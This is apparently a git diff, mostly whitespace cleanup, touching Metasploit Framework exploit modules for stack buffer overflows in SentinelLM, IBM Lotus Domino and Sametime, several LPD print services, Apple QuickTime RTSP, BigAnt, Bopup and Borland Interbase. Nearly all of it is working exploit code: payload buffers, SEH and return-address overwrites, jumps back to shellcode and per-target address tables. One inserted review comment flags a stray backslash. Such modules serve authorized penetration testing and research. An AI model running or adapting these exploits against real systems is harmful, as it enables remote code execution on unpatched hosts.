@@ -61,19 +56,19 @@ class Metasploit3 < Msf::Exploit::Remote ['SentinelLM 7.2.0.0 Windows 2003 English SP0', { 'Ret' => 0x7ffc0638 }], # peb ], 'DisclosureDate' => 'Mar 07 2005' )) - - register_options( - [ - Opt::RPORT(5093) - ], self.class) + + register_options( + [ + Opt::RPORT(5093) + ], self.class) end - + def check connect_udp udp_sock.put("\x7a\x00\x00\x00\x00\x00") res = udp_sock.recvfrom(8192) disconnect_udp - + if (res and res[0] == 0x7a) return Exploit::CheckCode::Detected end @@ -82,22 +77,22 @@ class Metasploit3 < Msf::Exploit::Remote def exploit connect_udp - + # Payload goes first buf = payload.encoded + rand_text_english(2048-payload.encoded.length) - + # Return to a pop/pop/ret via SEH buf[836, 4] = [target.ret].pack('V') - + # The pop/pop/ret takes us here, jump back 5 bytes buf[832, 2] = "\xeb\xf9" - + # Now jump all the way back to our shellcode buf[827, 5] = "\xe9" + [-829].pack('V') - + udp_sock.put(buf) udp_sock.recvfrom(8192) - + handler disconnect_udp end diff --git a/modules/exploits/windows/lotus/domino_http_accept_language.rb b/modules/exploits/windows/lotus/domino_http_accept_language.rb index 412f972152..e44533386c 100644 --- a/modules/exploits/windows/lotus/domino_http_accept_language.rb +++ b/modules/exploits/windows/lotus/domino_http_accept_language.rb @@ -3,13 +3,12 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/projects/Framework/ ## - require 'msf/core' class Metasploit3 < Msf::Exploit::Remote 
@@ -21,7 +20,7 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'IBM Lotus Domino Web Server Accept-Language Stack Overflow', 'Description' => %q{ - This module exploits a stack overflow in IBM Lotus Domino Web Server + This module exploits a stack overflow in IBM Lotus Domino Web Server prior to version 7.0.3FP1 and 8.0.1. This flaw is triggered by any HTTP request with an Accept-Language header greater than 114 bytes. }, @@ -42,7 +41,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Privileged' => true, 'Payload' => { - 'Space' => 800, + 'Space' => 800, 'BadChars' => "\x00\x0a\x20\x2c\x3b", 'StackAdjustment' => -3500, }, @@ -110,8 +109,8 @@ class Metasploit3 < Msf::Exploit::Remote ], 'DisclosureDate' => 'May 20 2008')) - - register_options( [ Opt::RPORT(80) ], self.class ) + + register_options( [ Opt::RPORT(80) ], self.class ) end def exploit 
@@ -119,24 +118,24 @@ class Metasploit3 < Msf::Exploit::Remote lang = rand_text_alphanumeric(116) # greetz to hateful chris lang[ 56, 4 ] = [ 0xfffffffe ].pack('V') # Fix Second crash (esi) - lang[ 68, 4 ] = [ 0x7ffaf0ec ].pack('V') # Fix Second crash (eax) + lang[ 68, 4 ] = [ 0x7ffaf0ec ].pack('V') # Fix Second crash (eax) lang[ 104, 4 ] = [ 0x7ffaf030 ].pack('V') # Fix First crash - lang[ 112, 4 ] = [target['FixESP']].pack('V') # 1 + lang[ 112, 4 ] = [target['FixESP']].pack('V') # 1 lang << "\x00" lang << payload.encoded if(not target['DisableNX']) lang[ 16, 15 ] = Metasm::Shellcode.assemble(Metasm::Ia32.new, "add esp,-0xc4 pop edi sub edi,-0x86 call edi").encode_string # 4 - lang[ 80, 4 ] = [target['JmpESP']].pack('V') # 2 + lang[ 80, 4 ] = [target['JmpESP']].pack('V') # 2 lang[ 84, 2 ] = Rex::Arch::X86.jmp_short(-0x46) # 3 jmp back to top else lang[ 16, 16 ] = Metasm::Shellcode.assemble(Metasm::Ia32.new, "add esp,-0xd8 pop edi pop edi sub edi,-0x86 call edi").encode_string # 8 - lang[ 80, 4 ] = [target['FixESI']].pack('V') # 2 + lang[ 80, 4 ] = [target['FixESI']].pack('V') # 2 lang[ 84, 4 ] = [target['FixEBP']].pack('V') # 3 - lang[ 88, 4 ] = [target['Ret']].pack('V') # 4 + lang[ 88, 4 ] = [target['Ret']].pack('V') # 4 lang[ 92, 4 ] = [target['JmpESP']].pack('V') # 6 - lang[ 100, 2 ] = Rex::Arch::X86.jmp_short(-0x56) # 7 jmp back to top - lang[ 108, 4 ] = [target['DisableNX']].pack('V') # 5 + lang[ 100, 2 ] = Rex::Arch::X86.jmp_short(-0x56) # 7 jmp back to top + lang[ 108, 4 ] = [target['DisableNX']].pack('V') # 5 end uri = rand_text_alpha_lower(16) + '.nsf?' + rand_text_highascii(1) # Trigger diff --git a/modules/exploits/windows/lotus/domino_sametime_stmux.rb b/modules/exploits/windows/lotus/domino_sametime_stmux.rb index d7789eade0..ad844750aa 100644 --- a/modules/exploits/windows/lotus/domino_sametime_stmux.rb +++ b/modules/exploits/windows/lotus/domino_sametime_stmux.rb 
@@ -21,22 +21,22 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'IBM Lotus Domino Sametime STMux.exe Stack Overflow', 'Description' => %q{ - This module exploits a stack overflow in Lotus Domino's Sametime + This module exploits a stack overflow in Lotus Domino\'s Sametime Server. By sending an overly long POST request to the Multiplexer STMux.exe service we are able to overwrite SEH. Based on the exploit by Manuel Santamarina Suarez. }, - 'Author' => [ 'patrick', 'riaf <riaf@mysec.org>' ], + 'Author' => [ 'patrick', 'riaf <riaf@mysec.org>' ], 'Arch' => [ ARCH_X86 ], 'License' => MSF_LICENSE, 'Version' => '$Revision$', 'References' => - [ - [ 'CVE', '2008-2499' ], - [ 'OSVDB', '45610' ], - [ 'BID', '29328' ], - [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-08-028/' ], - ], + [ + [ 'CVE', '2008-2499' ], + [ 'OSVDB', '45610' ], + [ 'BID', '29328' ], + [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-08-028/' ], + ], 'Privileged' => true, 'DefaultOptions' => { 
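Review bot: The new description line `Lotus Domino\'s Sametime` sits inside a `%q{ ... }` literal, where a backslash only escapes another backslash or the delimiter, so the module description now carries a literal backslash before the apostrophe. The original `Lotus Domino's Sametime` was already valid in `%q{}` and should be restored; this is the only non-whitespace edit in the hunk, so it is presumably accidental. The enclosing `initialize` call begins before this hunk.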
@@ -50,15 +50,15 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Platform' => ['win'], 'Targets' => - [ - # Patrick - Tested OK against Windows 2003 SP1 20081114 - [ 'Lotus Sametime 7.5 on Windows Server 2000 SP4', { 'Ret' => 0x7c3410c2, 'Offset' => [ 3, 268 ] }], # pop ecx, pop exc, ret msvcr71.dll - [ 'Lotus Sametime 7.5 on Windows Server 2003 SP1', { 'Ret' => 0x7c3410c2, 'Offset' => [ 3, 269 ] }], # pop ecx, pop exc, ret msvcr71.dll - [ 'Lotus Sametime 7.5 on Windows Server 2003 SP2', { 'Ret' => 0x7c3410c2, 'Offset' => [ 4, 269 ] }], - [ 'Lotus Sametime 7.5.1 Windows Server 2003 SP2', { 'Ret' => 0x7c3410c2, 'Offset' => [ 5, 269 ] }], - [ 'Lotus Sametime 8.0.0 Windows Server 2003 SP2', { 'Ret' => 0x7c3410c2, 'Offset' => [ 4, 269 ] }], - ], - 'DisclosureDate' => 'May 21 2008', + [ + # Patrick - Tested OK against Windows 2003 SP1 20081114 + [ 'Lotus Sametime 7.5 on Windows Server 2000 SP4', { 'Ret' => 0x7c3410c2, 'Offset' => [ 3, 268 ] }], # pop ecx, pop exc, ret msvcr71.dll + [ 'Lotus Sametime 7.5 on Windows Server 2003 SP1', { 'Ret' => 0x7c3410c2, 'Offset' => [ 3, 269 ] }], # pop ecx, pop exc, ret msvcr71.dll + [ 'Lotus Sametime 7.5 on Windows Server 2003 SP2', { 'Ret' => 0x7c3410c2, 'Offset' => [ 4, 269 ] }], + [ 'Lotus Sametime 7.5.1 Windows Server 2003 SP2', { 'Ret' => 0x7c3410c2, 'Offset' => [ 5, 269 ] }], + [ 'Lotus Sametime 8.0.0 Windows Server 2003 SP2', { 'Ret' => 0x7c3410c2, 'Offset' => [ 4, 269 ] }], + ], + 'DisclosureDate' => 'May 21 2008', 'DefaultTarget' => 1)) register_options( @@ -88,7 +88,7 @@ class Metasploit3 < Msf::Exploit::Remote res = sock.get_once(-1,3) disconnect - + if (res =~/200 OK/) return Exploit::CheckCode::Detected end 
@@ -101,16 +101,16 @@ class Metasploit3 < Msf::Exploit::Remote connect pad1 = rand_text_alpha_lower(44) - pad2 = rand_text_alpha_lower(29) + pad2 = rand_text_alpha_lower(29) # Patrick - We should use Metasm here. - popebx = Metasm::Shellcode.assemble(Metasm::Ia32.new, "pop ebx").encode_string * target['Offset'][0] - popad = Metasm::Shellcode.assemble(Metasm::Ia32.new, "popad").encode_string * target['Offset'][1] - esp = "\xff\x24\x24" # dword ptr ss:[esp] + popebx = Metasm::Shellcode.assemble(Metasm::Ia32.new, "pop ebx").encode_string * target['Offset'][0] + popad = Metasm::Shellcode.assemble(Metasm::Ia32.new, "popad").encode_string * target['Offset'][1] + esp = "\xff\x24\x24" # dword ptr ss:[esp] jmp = "\x74\x23" + "\x75\x21" # je short, jnz short - seh = [target['Ret']].pack('V') + seh = [target['Ret']].pack('V') - path = pad1 + jmp + seh + pad2 + popebx + popad + esp + path = pad1 + jmp + seh + pad2 + popebx + popad + esp req = "POST /CommunityCBR/CC.39.#{path}/\r\n" req << "User-Agent: Sametime Community Agent\r\n" diff --git a/modules/exploits/windows/lpd/hummingbird_exceed.rb b/modules/exploits/windows/lpd/hummingbird_exceed.rb index 6cccbdc908..97c157a18b 100644 --- a/modules/exploits/windows/lpd/hummingbird_exceed.rb +++ b/modules/exploits/windows/lpd/hummingbird_exceed.rb 
@@ -3,27 +3,25 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::Seh - + def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'Hummingbird Connectivity 10 SP5 LPD Buffer Overflow', 'Description' => %q{ - This module exploits a stack overflow in Hummingbird Connectivity + This module exploits a stack overflow in Hummingbird Connectivity 10 LPD Daemon. This module has only been tested against Hummingbird Exceed v10 with SP5. }, @@ -37,12 +35,11 @@ class Metasploit3 < Msf::Exploit::Remote ['BID', '13788'], ], 'Privileged' => true, - + 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, - 'Payload' => { 'Space' => 500, @@ -50,27 +47,27 @@ class Metasploit3 < Msf::Exploit::Remote 'StackAdjustment' => -3500, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ ['Windows 2000 English SP0-SP4', { 'Offset' => 1620, 'Ret' => 0x75022ac4 }], ['Windows XP English SP0/SP1', { 'Offset' => 1596, 'Ret' => 0x71aa2461 }], ], 'DisclosureDate' => 'May 27 2005')) - - register_options( [ Opt::RPORT(515) ], self.class ) + + register_options( [ Opt::RPORT(515) ], self.class ) end def exploit connect - + filler = rand_text_english(target['Offset'], payload_badchars) seh = generate_seh_payload(target.ret) sploit = filler + seh print_status("Trying target #{target.name}...") sock.put(sploit) - + handler disconnect end diff --git a/modules/exploits/windows/lpd/niprint.rb b/modules/exploits/windows/lpd/niprint.rb index 7543f8c4a8..b4b9837277 100644 --- a/modules/exploits/windows/lpd/niprint.rb 
+++ b/modules/exploits/windows/lpd/niprint.rb @@ -3,27 +3,24 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp - def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'NIPrint LPD Request Overflow', 'Description' => %q{ - This module exploits a stack overflow in the + This module exploits a stack overflow in the Network Instrument NIPrint LPD service. Inspired by Immunity's VisualSploit :-) }, @@ -38,7 +35,6 @@ class Metasploit3 < Msf::Exploit::Remote ['URL', 'http://www.immunitysec.com/documentation/vs_niprint.html'], ], 'Privileged' => false, - 'Payload' => { 'Space' => 500, @@ -46,27 +42,26 @@ class Metasploit3 < Msf::Exploit::Remote 'StackAdjustment' => -3500, }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ ['NIPrint3.EXE (TDS:0x3a045ff2)', { 'Ret' => 0x00404236 }], # jmp esi ], - 'DefaultTarget' => 0)) - - register_options( [ Opt::RPORT(515) ], self.class ) + + register_options( [ Opt::RPORT(515) ], self.class ) end def exploit connect - + req = rand_text_alphanumeric(8192) req[ 0, 2] = "\xeb\x33" req[ 49, 4] = [target.ret].pack('V') req[ 53, payload.encoded.length ] = payload.encoded - + print_status("Trying target #{target.name}...") sock.put(req) - + handler disconnect end diff --git a/modules/exploits/windows/lpd/saplpd.rb b/modules/exploits/windows/lpd/saplpd.rb index dde52e75f6..6838db8a56 100644 --- a/modules/exploits/windows/lpd/saplpd.rb +++ b/modules/exploits/windows/lpd/saplpd.rb @@ -9,10 +9,8 @@ # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking 
@@ -23,14 +21,14 @@ class Metasploit3 < Msf::Exploit::Remote 'Name' => 'SAP SAPLPD 6.28 Buffer Overflow', 'Description' => %q{ This module exploits a stack overflow in SAPlpd 6.28 (SAP Release 6.40) . - By sending an overly long argument, an attacker may be able to execute arbitrary - code. + By sending an overly long argument, an attacker may be able to execute arbitrary + code. }, 'Author' => 'MC', 'License' => MSF_LICENSE, 'Version' => '$Revision$', - 'References' => - [ + 'References' => + [ [ 'CVE', '2008-0621' ], [ 'OSVDB', '41127' ], [ 'BID', '27613' ], @@ -44,7 +42,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Space' => 400, 'BadChars' => "\x00\x0a", 'StackAdjustment' => -3500, - 'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44", + 'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44", }, 'Platform' => 'win', 'Targets' => @@ -55,7 +53,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DisclosureDate' => 'Feb 4 2008', 'DefaultTarget' => 0)) - register_options([Opt::RPORT(515)], self) + register_options([Opt::RPORT(515)], self) end def exploit @@ -68,7 +66,7 @@ class Metasploit3 < Msf::Exploit::Remote sploit << [0xe9, -375].pack('CV') print_status("Trying target #{target.name}...") - + sock.puts(sploit) handler diff --git a/modules/exploits/windows/lpd/wincomlpd_admin.rb b/modules/exploits/windows/lpd/wincomlpd_admin.rb index 47a2815f58..7340385a94 100644 --- a/modules/exploits/windows/lpd/wincomlpd_admin.rb +++ b/modules/exploits/windows/lpd/wincomlpd_admin.rb @@ -9,10 +9,8 @@ # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GoodRanking 
@@ -23,15 +21,15 @@ class Metasploit3 < Msf::Exploit::Remote 'Name' => 'WinComLPD <= 3.0.2 Buffer Overflow', 'Description' => %q{ This module exploits a stack overflow in WinComLPD <= 3.0.2. - By sending an overly long authentication packet to the remote - adminstration service, an attacker may be able to execute arbitrary - code. + By sending an overly long authentication packet to the remote + adminstration service, an attacker may be able to execute arbitrary + code. }, 'Author' => 'MC', 'License' => MSF_LICENSE, 'Version' => '$Revision$', - 'References' => - [ + 'References' => + [ ['CVE', '2008-5159'], ['OSVDB', '42861'], ['BID', '27614'], @@ -44,7 +42,7 @@ class Metasploit3 < Msf::Exploit::Remote { 'Space' => 600, 'BadChars' => "\x00\x0a", - 'StackAdjustment' => -3500, + 'StackAdjustment' => -3500, }, 'Platform' => 'win', 'Targets' => @@ -55,7 +53,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DisclosureDate' => 'Feb 4 2008', 'DefaultTarget' => 0)) - register_options([Opt::RPORT(13500)], self) + register_options([Opt::RPORT(13500)], self) end def exploit @@ -69,7 +67,7 @@ class Metasploit3 < Msf::Exploit::Remote sploit << [0xe8, -550].pack('CV') + rand_text_alpha(rand(324) + 1) print_status("Trying target #{target.name}...") - + sock.puts(sploit) sleep(5) diff --git a/modules/exploits/windows/misc/apple_quicktime_rtsp_response.rb b/modules/exploits/windows/misc/apple_quicktime_rtsp_response.rb index fff7aeb766..7b4d505e10 100644 --- a/modules/exploits/windows/misc/apple_quicktime_rtsp_response.rb +++ b/modules/exploits/windows/misc/apple_quicktime_rtsp_response.rb 
@@ -3,14 +3,12 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - - class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking @@ -21,16 +19,16 @@ class Metasploit3 < Msf::Exploit::Remote 'Name' => 'Apple QuickTime 7.3 RTSP Response Header Buffer Overflow', 'Description' => %q{ This module exploits a stack overflow in Apple QuickTime 7.3. By sending an overly long - RTSP response to a client, an attacker may be able to execute arbitrary code. + RTSP response to a client, an attacker may be able to execute arbitrary code. }, 'Author' => 'MC', 'License' => MSF_LICENSE, 'Version' => '$Revision$', - 'References' => + 'References' => [ [ 'CVE', '2007-6166' ], [ 'OSVDB', '40876' ], - [ 'BID', '26549' ], + [ 'BID', '26549' ], [ 'URL', 'http://milw0rm.com/exploits/4648' ], ], 'DefaultOptions' => @@ -54,17 +52,17 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultTarget' => 0)) register_options( - [ + [ OptPort.new('SRVPORT', [ true, "The RTSP daemon port to listen on", 554 ]) ], self.class) end def on_client_connect(client) - return if ((p = regenerate_payload(client)) == nil) + return if ((p = regenerate_payload(client)) == nil) client.get_once - buffer = rand_text_english(target['Offset']) + Rex::Arch::X86.jmp_short(6) + make_nops(2) + buffer = rand_text_english(target['Offset']) + Rex::Arch::X86.jmp_short(6) + make_nops(2) buffer << [target.ret].pack('V') + payload.encoded + rand_text_english(4092 - payload.encoded.length) strname = rand_text_alpha(rand(75) + 1) 
@@ -75,7 +73,7 @@ class Metasploit3 < Msf::Exploit::Remote header << "CSeq: 1\r\n" header << "Date: #{date}\r\n" header << "Content-Base: rtsp://0.0.0.0/#{strname}\r\n" - header << "Content-Type: #{buffer}\r\n" + header << "Content-Type: #{buffer}\r\n" header << "Content-Length: #{strname.length}\r\n\r\n" body = "v=#{num}\r\n" @@ -94,7 +92,7 @@ class Metasploit3 < Msf::Exploit::Remote body << "a=control:#{strname}\r\n" sploit = header + body - + print_status("Sending #{sploit.length} bytes to #{client.peerhost}:#{client.peerport}...") client.put(sploit) diff --git a/modules/exploits/windows/misc/asus_dpcproxy_overflow.rb b/modules/exploits/windows/misc/asus_dpcproxy_overflow.rb index 3de2519164..9dc47a6e69 100644 --- a/modules/exploits/windows/misc/asus_dpcproxy_overflow.rb +++ b/modules/exploits/windows/misc/asus_dpcproxy_overflow.rb @@ -3,16 +3,14 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking @@ -28,8 +26,8 @@ class Metasploit3 < Msf::Exploit::Remote }, 'Author' => 'Jacopo Cervini', 'Version' => '$Revision$', - 'References' => - [ + 'References' => + [ [ 'CVE', '2008-1491' ], [ 'OSVDB', '43638' ], [ 'BID', '28394' ], @@ -52,7 +50,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultTarget' => 0, 'DisclosureDate' => 'March 21 2008')) - register_options([Opt::RPORT(623)], self.class) + register_options([Opt::RPORT(623)], self.class) end diff --git a/modules/exploits/windows/misc/bigant_server.rb b/modules/exploits/windows/misc/bigant_server.rb index 03aae96fc4..caf42c27e7 100644 --- a/modules/exploits/windows/misc/bigant_server.rb +++ b/modules/exploits/windows/misc/bigant_server.rb 
@@ -3,16 +3,14 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking @@ -24,14 +22,14 @@ class Metasploit3 < Msf::Exploit::Remote 'Name' => 'BigAnt Server 2.2 Buffer Overflow', 'Description' => %q{ This module exploits a stack overflow in BigAnt Server 2.2. - By sending a specially crafted packet, an attacker may be - able to execute arbitrary code. + By sending a specially crafted packet, an attacker may be + able to execute arbitrary code. }, 'Author' => [ 'MC' ], - 'License' => MSF_LICENSE, + 'License' => MSF_LICENSE, 'Version' => '$Revision$', - 'References' => - [ + 'References' => + [ [ 'CVE', '2008-1914' ], [ 'OSVDB', '44454' ], [ 'BID', '28795' ], @@ -53,22 +51,21 @@ class Metasploit3 < Msf::Exploit::Remote 'Targets' => [ [ 'Windows 2000 Pro All English', { 'Ret' => 0x75022ac4 } ], - [ 'Windows XP Pro SP0/SP1 English', { 'Ret' => 0x71aa32ad } ], + [ 'Windows XP Pro SP0/SP1 English', { 'Ret' => 0x71aa32ad } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Apr 15 2008')) - register_options([Opt::RPORT(6080)], self.class) - + register_options([Opt::RPORT(6080)], self.class) end def exploit connect - + sploit = "GET " + rand_text_alpha_upper(950) + generate_seh_payload(target.ret) sploit << rand_text_alpha_upper(1024 - payload.encoded.length) - - print_status("Trying target #{target.name}...") + + print_status("Trying target #{target.name}...") sock.put(sploit + "\n\n") handler diff --git a/modules/exploits/windows/misc/bigant_server_250.rb b/modules/exploits/windows/misc/bigant_server_250.rb index dc942cf8d6..fc831f2cb5 100644 --- a/modules/exploits/windows/misc/bigant_server_250.rb 
+++ b/modules/exploits/windows/misc/bigant_server_250.rb @@ -3,16 +3,14 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = GreatRanking @@ -20,7 +18,7 @@ class Metasploit3 < Msf::Exploit::Remote include Msf::Exploit::Remote::Seh def initialize(info = {}) - super(update_info(info, + super(update_info(info, 'Name' => 'BigAnt Server 2.50 SP1 Buffer Overflow', 'Description' => %q{ This exploits a stack overflow in the BigAnt Messaging Service, @@ -36,7 +34,7 @@ class Metasploit3 < Msf::Exploit::Remote [ 'URL', 'http://www.exploit-db.com/exploits/9690' ] # It's not clear if these are correct - there was a fix for - # the v2.2 vuln back in Dec 2008 + # the v2.2 vuln back in Dec 2008 #[ 'C_VE', '2008-1914' ], #[ 'O_SVDB', '44454' ], #[ 'B_ID', '28795' ], @@ -56,7 +54,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DisableNops' => 'True', }, 'Platform' => 'win', - 'Targets' => + 'Targets' => [ [ 'BigAnt 2.5 Universal', { 'Ret' => 0x0f9a196a } ], # Tested OK (Dr_IDE & patrickw) p/p/r VBAJET32.dll xpsp3 & w2k [ 'Windows 2000 Pro All English', { 'Ret' => 0x75022ac4 } ], # p/p/r Tested OK (patrickw 20090918) @@ -64,19 +62,19 @@ class Metasploit3 < Msf::Exploit::Remote ], 'DefaultTarget' => 0)) #, # 'DisclosureDate' => 'Apr 13 2008')) - - register_options([Opt::RPORT(6660)], self.class) + + register_options([Opt::RPORT(6660)], self.class) end def exploit connect - + sploit = "GET " + rand_text_alpha_upper(985) + generate_seh_payload(target.ret) sploit << rand_text_alpha_upper(1000 - payload.encoded.length) print_status("Trying target #{target.name}...") sock.put(sploit + "\r\n\r\n") - + handler disconnect end 
diff --git a/modules/exploits/windows/misc/bomberclone_overflow.rb b/modules/exploits/windows/misc/bomberclone_overflow.rb index d82ca81f38..1d6b805dec 100644 --- a/modules/exploits/windows/misc/bomberclone_overflow.rb +++ b/modules/exploits/windows/misc/bomberclone_overflow.rb @@ -3,16 +3,14 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking @@ -22,18 +20,18 @@ class Metasploit3 < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Bomberclone 0.11.6 Buffer Overflow', 'Description' => %q{ - This module exploits a stack buffer overflow in Bomberclone 0.11.6 for Windows. - The return address is overwritten with lstrcpyA memory address, - the second and third value are the destination buffer, - the fourth value is the source address of our buffer in the stack. - This exploit is like a return in libc. - - ATTENTION - The shellcode is exec ONLY when someone try to close bomberclone. + This module exploits a stack buffer overflow in Bomberclone 0.11.6 for Windows. + The return address is overwritten with lstrcpyA memory address, + the second and third value are the destination buffer, + the fourth value is the source address of our buffer in the stack. + This exploit is like a return in libc. + + ATTENTION + The shellcode is exec ONLY when someone try to close bomberclone. }, 'Author' => 'Jacopo Cervini <acaro[at]jervus.it>', 'Version' => '$Revision$', - 'References' => + 'References' => [ ['CVE', '2006-0460'], ['OSVDB', '23263'], 
@@ -52,12 +50,11 @@ class Metasploit3 < Msf::Exploit::Remote ['Windows 2000 SP1 English', { 'Ret' => 0x77e85f08, } ], # kernel32!lstrcpyA ['Windows 2000 SP1 English', { 'Ret' => 0x77e95e8b, } ], # kernel32!lstrcpyA ], - 'Privileged' => false, 'DisclosureDate' => 'Feb 16 2006' )) - register_options([ Opt::RPORT(11000) ], self.class) + register_options([ Opt::RPORT(11000) ], self.class) end def exploit diff --git a/modules/exploits/windows/misc/bopup_comm.rb b/modules/exploits/windows/misc/bopup_comm.rb index bd7b4f3dca..4737831fb0 100644 --- a/modules/exploits/windows/misc/bopup_comm.rb +++ b/modules/exploits/windows/misc/bopup_comm.rb @@ -1,5 +1,9 @@ ## -# This file is part of the Metasploit Framework and may be subject to +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ @@ -21,14 +25,14 @@ class Metasploit3 < Msf::Exploit::Remote able to execute arbitrary code. }, 'Author' => [ 'MC' ], - 'License' => MSF_LICENSE, + 'License' => MSF_LICENSE, 'Version' => '$Revision$', - 'References' => - [ + 'References' => + [ [ 'CVE', '2009-2227' ], [ 'OSVDB', '55275' ], [ 'URL', 'http://www.blabsoft.com/products/server' ], - [ 'URL', 'http://milw0rm.com/exploits/9002' ], + [ 'URL', 'http://milw0rm.com/exploits/9002' ], ], 'DefaultOptions' => { @@ -50,13 +54,15 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultTarget' => 0, 'DisclosureDate' => 'Jun 18 2009')) - register_options([Opt::RPORT(19810)], self.class) - + register_options( + [ + Opt::RPORT(19810) + ], self.class) end def exploit connect - + sploit = [0x00000001].pack('V') sploit << rand_text_alpha_upper(829 - payload.encoded.length) sploit << payload.encoded 
@@ -64,8 +70,8 @@ class Metasploit3 < Msf::Exploit::Remote sploit << rand_text_alpha_upper(27) sploit << Rex::Arch::X86.jmp_short(222) + rand_text_english(2) sploit << [target.ret].pack('V') - - print_status("Trying target #{target.name}...") + + print_status("Trying target #{target.name}...") sock.put(sploit) handler diff --git a/modules/exploits/windows/misc/borland_interbase.rb b/modules/exploits/windows/misc/borland_interbase.rb index 4f04721eca..ef67e53d2f 100644 --- a/modules/exploits/windows/misc/borland_interbase.rb +++ b/modules/exploits/windows/misc/borland_interbase.rb @@ -3,16 +3,14 @@ ## ## -# This file is part of the Metasploit Framework and may be subject to +# This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## - require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking @@ -23,13 +21,13 @@ class Metasploit3 < Msf::Exploit::Remote 'Name' => 'Borland Interbase Create-Request Buffer Overflow', 'Description' => %q{ This module exploits a stack overflow in Borland Interbase 2007. - By sending a specially crafted create-request packet, a remote - attacker may be able to execute arbitrary code. + By sending a specially crafted create-request packet, a remote + attacker may be able to execute arbitrary code. }, 'Author' => 'MC', 'Version' => '$Revision$', - 'References' => - [ + 'References' => + [ [ 'CVE', '2007-3566' ], [ 'OSVDB', '38602' ], [ 'URL', 'http://dvlabs.tippingpoint.com/advisory/TPTI-07-13' ], @@ -41,9 +39,9 @@ class Metasploit3 < Msf::Exploit::Remote 'Payload' => { 'Space' => 850, - 'BadChars' => "\x00", + 'BadChars' => "\x00", 'PrependEncoder' => "\x81\xc4\xff\xef\xff\xff\x44", - 'EncoderType' => Msf::Encoder::Type::AlphanumUpper, + 'EncoderType' => Msf::Encoder::Type::AlphanumUpper, }, 'Platform' => 'win', 'Targets' => 
